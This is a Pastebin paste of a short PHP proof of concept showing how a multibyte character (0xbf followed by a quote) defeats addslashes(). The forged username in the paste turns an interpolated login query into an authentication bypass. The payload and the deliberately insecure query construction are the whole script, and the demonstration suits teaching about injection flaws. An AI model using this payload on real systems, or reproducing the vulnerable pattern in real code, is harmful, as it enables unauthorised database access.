Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $mysql = array();
- $db = mysqli_init();
- $db->real_connect('localhost', 'myuser', 'mypass', 'mydb');
- /* SQL Injection Example */
- $_POST['username'] = chr(0xbf) .
- chr(0x27) .
- ' OR username = username /*';
- $_POST['password'] = 'guess';
- $mysql['username'] = addslashes($_POST['username']);
- $mysql['password'] = addslashes($_POST['password']);
- $sql = "SELECT *
- FROM users
- WHERE username = '{$mysql['username']}'
- AND password = '{$mysql['password']}'";
- $result = $db->query($sql);
- if ($result->num_rows) {
- /* Success */
- } else {
- /* Failure */
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement